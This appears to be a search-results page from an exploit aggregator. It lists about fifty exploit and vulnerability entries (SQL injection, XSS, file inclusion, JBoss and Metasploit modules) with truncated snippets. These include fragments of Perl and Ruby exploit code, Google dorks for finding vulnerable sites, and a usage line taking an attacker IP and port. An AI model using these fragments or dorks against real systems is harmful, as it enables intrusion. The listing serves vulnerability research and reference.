56796 matches found
Asus Dpcproxy Buffer Overflow
No description provided by source. $Id: asusdpcproxyoverflow.rb 9583 2010-06-22 19:11:05Z todb $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms...
Expinion.net Member Management System 2.1 error.asp err Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/9932/info It has been reported that a number of Member Management System scripts are prone to cross-site scripting vulnerabilities. These issues are reportedly due to a failure to sanitize user input and so allow HTML and...
ownCloud 6.0.0a - Multiple Vulnerabilities
No description provided by source. Exploit Title: ownCloud 6.0.0a File Deletion XSS and CSRF Protection Bypass Vendor Homepage: www.ownCloud.org OwnCloud Version: 6.0.0a Browsers tested: Iceweasel 22.0; Internet Explorer 11; Server: Debian. Default LAMP set-up. Exploit Author: James Sibley absane...
FuseTalk <= 4.0 AuthError.CFM Multiple Cross Site Scripting Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/24564/info FuseTalk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. An attacker can exploit these issues to steal cookie-based...
videodb <= 3.0.3 - Multiple Vulnerabilities
No description provided by source. Exploit Title: VideoDB Multiple Vulnerabilities Date: 09.10.2010 Author: Valentin Category: webapps/0day Version: 3.0.3 and earlier Tested on: CVE : Code : :::::::::::::::::::::::::::::::::::::: 0x1 :::::::::::::::::::::::::::::::::::::: General Information...
SLAED CMS 4 Installation Script Unauthorized Access Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/38453/info SLAED CMS is prone to an unauthorized-access vulnerability. Attackers can exploit this issue to obtain unauthorized access to installation scripts. SLAED CMS 4 is vulnerable; other versions may also be affected...
Nwahy Articles 2.2 - CSRF Add Admin
No description provided by source. Exploit Title: Nwahy Articles V2.2 CSRF Add Admin Author: DaOne Date: 18-7-2012 Category: webapps Software Link: http://www.nwahy.com/upload/article-v2.2.rar Google dork: intext:Powered by Nwahy Articles V2.2 Exploit html body onload=document.form0.submit; form...
Wordpress Event Registration plugin <= 5.44 SQL Injection Vulnerability
No description provided by source. Exploit Title: Wordpress Event Registration plugin = 5.44 SQl Injection Vulnerability Google Dork: ?regeventaction=register&eventid Date: 2011-09-09 Author: serk Vendor: http://edgetechweb.com/ Software Link:...
Plone 2.x MembershipTool Access Control Bypass Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/17484/info Plone is susceptible to a remote access-control bypass vulnerability. This issue is due to the application's failure to properly enforce privileges to various MembershipTool methods. This issue allows remote,...
Swoopo Clone 2010 SQL Injection Vunerability
No description provided by source. 1 1 0 I'm L0rd CrusAd3r member from Inj3ct0r Team 1 1 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 Author: L0rd CrusAd3r aka VSN [email protected] Exploit Title: Swoopo Clone 2010 SQL Vunerable Vendor url:http://www.euro-hq.com...
JBoss AS 2.0 - Remote Exploit
No description provided by source. THE FULL DAYTONA PACKAGE -- BY KINGCOPE, YEAR 2011 THREE JBOSS APPLICATION SERVER REMOTE EXPLOITS WITH AUTHEN BYPASS PORTED FROM METASPLOIT AND BEEFED UP WITH TWO SCANNERS: PNSCAN W/ SSL SUPPORT SYNSCAN MODDED FILES: daytonabsh.pl, daytonadeployfile.pl,...
Cisco Prime Data Center Network Manager - Arbitrary File Upload
No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include...
Symantec Workspace Streaming Arbitrary File Upload
No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' require 'rexml/document' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include...
Dotproject 2.0 /modules/public/calendar.php baseDir Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issues to includ...
ClickAndRank Script - Authentication Bypass
No description provided by source. Exploit Title: ClickAndRank Script Authentication Bypass Date: 18/07/2010 Author: walid Software Link: null Version: null Tested on: Windows CVE: null Found By: WaLiD E-mail: RezultasatGmailDotcom GreeTZ: Amine/v4-team.com/Madjix...
Trend Micro OfficeScan - Buffer Overflow Vulnerability and Denial of Service Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/28020/info Trend Micro OfficeScan Corporate Edition is prone to a buffer-overflow vulnerability and a denial-of-service vulnerability because the application fails to properly bounds-check user-supplied data before copyin...
Scripts Feed Business Directory SQL Injection Vulnerability
No description provided by source. ============================================================================== Scripts Feed Business Directory SQL Injection Vulnerability ============================================================================== + My home http://hack-tech.com + Date...
odlican.net cms 1.5 - Remote File Upload Vulnerability
漏洞分析 upload.php php if isset$POST'pokreni' $targetpath = "files/"; $targetpath = $targetpath . basename $FILES'uploadedfile''name'; ifmoveuploadedfile$FILES'uploadedfile''tmpname', $targetpath echo "Datoteka ". basename $FILES'uploadedfile''name'. " je snimljena na server"; else echo "Došlo je...
WFTPD Explorer Pro 1.0 - Remote Heap Overflow PoC
No description provided by source. WftpdExpProHeapPoC.py Discovered by r4x Kamil Szczerba [email protected] Soft : WFTPD Explorer Pro 1.0 Vendor : Texas Imperial Software Vuln : Heap Overwlow Res: LIST Exploit : PoC Reg Overwrite Reg: EAX = 41414141 ECX = 41414141 EDX = 00a57b38 ASCII AAAA... ESI =...
GOM player 2.1.9 - Local crash PoC
No description provided by source. !usr/bin/perl Exploits title :GOM player V 2.1.9 Local crash poc Date : 2010/01/02 Aouther : SarBoT511 downloads :http://en.kioskea.net/telecharger/download-2141-gom-player tested on :win xp sp2 GOM player V 2.1.9 $file=SarBoT511.asx; $boom=A x 2000;...
Linux Kernel <= 2.6.3 (setsockopt) Local Denial of Service Exploit
No description provided by source. / setsockopt proof of concept code by Julien TINNES julien a.t cr0.org vulnerability found as always by Paul Starzetz This is only a lame POC which will crash the machine, no root shell here. Maybe later, when everybody will have an updated box. It should work o...
OpenKM Document Management System 5.1.7 Command Execution
No description provided by source. COMPASS SECURITY ADVISORY http://www.csnc.ch/ ID: COMPASS-2012-002 Product: OpenKM Document Management System 5.1.7 1 Vendor: OpenKM http://www.openkm.com/ Subject: Cross-site Request Forgery based OS Command Execution Risk: High Effect: Remotely exploitable...
JBoss JMX Console Deployer Upload and Execute
No description provided by source...
JBoss Application Server Remote Exploit
No description provided by source. JBoss AS Remote Exploit by Kingcope use IO::Socket; use LWP::UserAgent; use URI::Escape; use MIME::Base64; sub usage print JBoss AS Remote Exploit\nby Kingcope\n\nusage: perl jboss.pl target targetport yourip yourport win/lnx\n; print example: perl daytona.pl...
Journalness <= 4.1 (last_module) Remote Code Execution exploit
No description provided by source. !/usr/bin/perl Vendor url: journalness.sourceforge.net note: exploit requires Registerglobals = On in php.ini Iron http://www.randombase.com require LWP::UserAgent; print Journalness = 4.1 Remote Code Execution exploit By Iron - randombase.com Greets to everyone...
Aborior Encore Web Forum Remote Arbitrary Command Execution Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/10040/info Encore Web Forum is reported prone to an issue that may allow a remote user to execute arbitrary commands on a system implementing the forum software. This issue is due to the application's failure to properly...
Constructr CMS 3.03 Arbitrary File Upload
No description provided by source. !/usr/bin/env perl Constructr CMS 3.03 Arbitrary File Upload Author: plucky Email: [email protected] Vulnerable Page: /constructr/backend/media.php line App Download: http://sourceforge.net/projects/constructr/ Date: 23/03/2011 THX TO: yawn, shrod, h473 and...
Ciamos CMS <= 0.9.6b (config.php) Remote File Include Exploit
No description provided by source. !/usr/bin/perl use LWP::UserAgent; ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+...
CSO Lanifex Outreach Project Tool 0.946 b Request Origin Spoofing Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/6630/info It has been reported that OPT accepts the values supplied supplied by users in HTTP headers as the originating IP address of a request. It is possible for a remote host to supply a fake IP address in one of thes...
Simple Machines Forum 1.1.3 - Remote Blind SQL Injection Exploit
No description provided by source. !/usr/bin/perl Written By Michael Brooks contact: th3dotr00katgmaildotcom SMF 1.1.3 Extremely fast Blind SQL Injection Exploit! -Binary Search -Multi-Threaded -NO benchmark's Two SQL Injection flaws. Works with magicquotesgpc=On or Off. Total Bypass of SMF's SQL...
Oatmeal Studios Mail File 1.10 Arbitrary File Disclosure Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/1807/info OatMeal studios' Mail-File is a cgi application that allows for sending of certain files to user-specified email addresses via a web interface. A vulnerability exists in this script that can be used to send the...
Simple Message Board 2.0 beta1 Thread.CFM Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/14268/info A cross-site scripting vulnerability affects Simple Message Board. This issue is due to a failure of the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitra...
YaBB SE <= 1.5.5 - Remote Command Execution Exploit
No description provided by source. !/usr/bin/perl YaBB SE version = 1.5.5 commands execution exploit by RST/GHC GUI version = THIS IS UNPUBLISHED RST/GHC EXPLOIT CODE KEEP IT PRIVATE coded by 1dt.w0lf http://rst.void.ru http://ghc.ru use Tk; use Tk::Menu; use LWP::UserAgent; $top = MainWindow-new...
Simple CMS <= 1.0.3 (indexen.php area) Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl Simple CMS = 1.0.3 ?area= Remote SQL Injection Exploit Code by JosS Contact: sys-projectathotmail.com Spanish Hackers Team / Sys - Project http://www.spanish-hackers.com special thanks to ka0x print \t\t\n\n; print \t\t Simple CMS = 1.0.3 Remote S...
Simple PHP Blog 0.5.1 - Local File Inclusion Vulnerability
No description provided by source. Simple PHP Blog is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context ...
Rianxosencabos CMS 0.9 - Remote Add Admin Exploit
No description provided by source. !/usr/bin/perl -w Rianxosencabos CMS 0.9 Remote Add Admin Exploit Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz written by ka0x ka0x01 at gmail dot com D.O.M Labs - Security Researchers - www.domlabs.org - use LWP::UserAgent; my $host, $login,...
Pheap CMS <= 1.1 (lpref) Remote File Include Exploit
No description provided by source. !/usr/bin/perl use LWP::UserAgent; / + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - Pheap CMS = 1 lpref Remote File Include Exploit + + + - Script name: Pheap CMS v. 1 - Script site: http://pheap.barekoncept.com/ + + + - Find by: Kacper a.k.a Rahim + -...
SazCart <= 1.5.1 (prodid) Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl SazCart = v1.5.1 details&prodid Remote SQL Injection Exploit HomePage: http://www.sazcart.com Discovered & Coded by JosS Contact: sys-projectathotmail.com Spanish Hackers Team / Sys - Project / EspSeC http://www.spanish-hackers.com rgod forever :D...
MosReporter Joomla Component 0.9.3 - Remote File Include Exploit
No description provided by source. !/usr/bin/perl MosReporter Joomla Component Remote File Inclusion Exploit Download Script http://mamboxchange.com/tracker/download.php/196/805/1010/119/reportermambelfish.zip Bug Found & coded By CrackersChild [email protected] Kullanimi perl...
MiniPort@l <= 0.1.5 beta (skiny) Remote File Include Vulnerability
No description provided by source. !/usr/bin/perl use LWP::UserAgent; / + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - MiniPort@l = 2.0 skiny Remote File Include Exploit + + + - Script name: MiniPort@l v. 0.1.5 - Script site: http://mlodylis.xcx.pl/ + + + - Find by: Kacper a.k.a Rahim + -...
Subdreamer 2.2.1 - SQL Injection / Command Execution Exploit
No description provided by source. !/usr/bin/perl Subdreamer 2.2.1 command exec exploit @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ supported targets: without forum integration with phpBB2 integration with ipb2 integration with vbulletin2 integration...
Hedgehog-CMS <= 1.21 Remote Command Execution Exploit
No description provided by source. --+++===================================================================+++-- --+++====== Hedgedog-CMS = 1.21 Remote Command Execution Exploit ======+++-- --+++===================================================================+++-- !/usr/bin/perl use strict; us...
Scientific Image DataBase <= 0.41 - Blind SQL Injection Exploit
No description provided by source. !/usr/bin/perl use strict; use warnings; use LWP::UserAgent; Download: http://sidb.sourceforge.net/ Dork: Scientific Image DataBase This exploit retrives the admin username/password via blind mysql injection. print INFO; heredocs is ugly.. so is my INFO ;...
DBHcms <= 1.1.4 - Remote File Inclusion exploit
No description provided by source. !/usr/bin/perl DBHcms = 1.1.4 Remote File Inclusion exploit Vendor url: www.drbenhur.com exploit is hard to execute through a browser -possible though- since it's with POST Iron http://www.randombase.com require LWP::UserAgent; Shell: ?php...
Microsoft IIS 5 User Existence Disclosure Vulnerability (2)
No description provided by source. source: http://www.securityfocus.com/bid/7492/info Microsoft IIS is prone to an issue where the existence of users may be revealed to remote attackers. The vulnerability exists when users attempt to authenticate against a vulnerable system. IIS will generate an...
iGaming CMS <= 1.5 - Multiple Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl ---------------------------------------------------------- iGaming = 1.5 Multiple Remote SQL Injection Exploit Perl Exploit - Output: id:admin:password Discovered On: 23/09/2008 Discovered By: StAkeR - StAkeRathotmaildotit Proud To Be Italian...
MDaemon <= 9.6.5 - Multiple Remote Buffer Overflow Exploit PoC
No description provided by source. MDaemon == v9.6.5 Multiple Remote Buffer Overflow Vendor Site: http://altn.com Risk : Highly Critical hehe funny bugs here .. the worldclient use the port 3000 for a webmail like it use also an admin webmail located at port 1000 by default both are opened this...
Joomla Tags (index.php, tag parameter) SQL Injection
No description provided by source. Exploit Title: Joomla tag Remote Sql Exploit dork: inurl:index.php?option=comtag Date: 18-10-2012 Author: Daniel Barragan D4NB4R Twitter: @D4NB4R Vendor: http://www.joomlatags.org Version: all License: Non-Commercial Download:...
Joomla Component JooBB 0.5.9 - Blind SQL Injection Exploit
No description provided by source. !/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV1 print \n; print \n; print Joomla Component Joo!BB Blind SQL Injection Exploit \n; print Author:His0k4 ALGERIAN HaCkeR \n; print \n; print Conctact: His0k4.hlmatgamil.com \n; print Greetz: All friends...
AJ Matrix DNA SQL Injection
No description provided by source. !usr/bin/perl |------------------------------------------------------------------------------------------------------------------ | -Info: | -Name: AJ Matrix DNA | -Site: http://www.ajsquare.com/ajhome.php | -Bug: Sql Injection | -Found: by Br0ly | -BRAZIL D |...